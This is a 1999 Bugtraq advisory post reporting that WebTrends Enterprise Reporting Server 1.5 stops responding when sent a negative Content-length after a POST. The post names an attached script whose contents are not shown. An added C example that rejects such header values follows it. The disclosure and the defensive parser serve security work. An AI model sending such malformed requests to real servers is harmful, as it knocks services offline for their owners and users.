[11323] in bugtraq
Remote DoS of WebTrends Enterprise Reporting Server
daemon@ATHENA.MIT.EDU (rpc)
Tue Aug 10 00:42:33 1999
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="_=XFMail.1.3.p0.Linux:990808151156:7732=_"
Message-Id: <XFMail.990808151156.jared@antisocial.com>
Date: Sun, 8 Aug 1999 15:11:56 -0000
Reply-To: rpc <jared@ANTISOCIAL.COM>
From: rpc <jared@ANTISOCIAL.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format
--_=XFMail.1.3.p0.Linux:990808151156:7732=_
Content-Type: text/plain; charset=us-ascii
Hi,
WebTrends Enterprise Reporting Server version 1.5 (Linux/Solaris) is vulnerable
to a denial of service attack utilizing the Content-length field passed to
the HTTP daemon. If a negative Content-length is passed to the daemon after a
POST method has been called, the server will stop responding. WebTrends has been
notified and a patch is supposedly in the works. Attached is an example script
to demonstrate the problem.
Version: 1.5 (1.5a has not been tested)
OS: Linux 2.2.x and Solaris (v?)
License: Full
Thanks,
rpc <jared@antisocial.com>
--_=XFMail.1.3.p0.Linux:990808151156:7732=_
Content-Disposition: attachment; filename="wtkill.pl"
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream; name=wtkill.pl; SizeOnDisk=445
--_=XFMail.1.3.p0.Linux:990808151156:7732=_--
End of MIME message
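
A server-side check that refuses the negative Content-length described in the message above, as an added example that is not part of the original post and is not WebTrends code. The function name `parse_content_length` and the `MAX_BODY_BYTES` cap are assumptions chosen for illustration; the header values in `main` are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical upper bound on an accepted request body (assumption). */
#define MAX_BODY_BYTES (8u * 1024u * 1024u)

enum cl_status { CL_OK = 0, CL_MALFORMED = -1, CL_TOO_LARGE = -2 };

/*
 * Parse the value of a Content-Length header.
 * Accepts only 1*DIGIT with optional surrounding whitespace, so "-1",
 * "+5", "" and "12abc" are rejected instead of being handed to
 * atoi()/strtol(), which would return a negative or partial number.
 */
enum cl_status parse_content_length(const char *value, size_t *out)
{
    uint64_t n = 0;
    const char *p = value;

    if (value == NULL || out == NULL)
        return CL_MALFORMED;
    while (*p == ' ' || *p == '\t')
        p++;
    if (!isdigit((unsigned char)*p))
        return CL_MALFORMED;            /* catches the leading '-' */
    for (; isdigit((unsigned char)*p); p++) {
        n = n * 10 + (uint64_t)(*p - '0');
        if (n > MAX_BODY_BYTES)
            return CL_TOO_LARGE;        /* stop before n can overflow */
    }
    while (*p == ' ' || *p == '\t' || *p == '\r' || *p == '\n')
        p++;
    if (*p != '\0')
        return CL_MALFORMED;            /* trailing junk after the digits */
    *out = (size_t)n;
    return CL_OK;
}

int main(void)
{
    /* Constructed sample header values. */
    const char *samples[] = { "-1", "42", " 0\r\n", "12abc", "99999999999" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        size_t len = 0;
        int rc = parse_content_length(samples[i], &len);
        printf("%-12s -> status %d, length %zu\n", samples[i], rc, len);
    }
    return 0;
}
```

A request whose header fails this check should get a 400 response and have its connection closed before any body read is attempted.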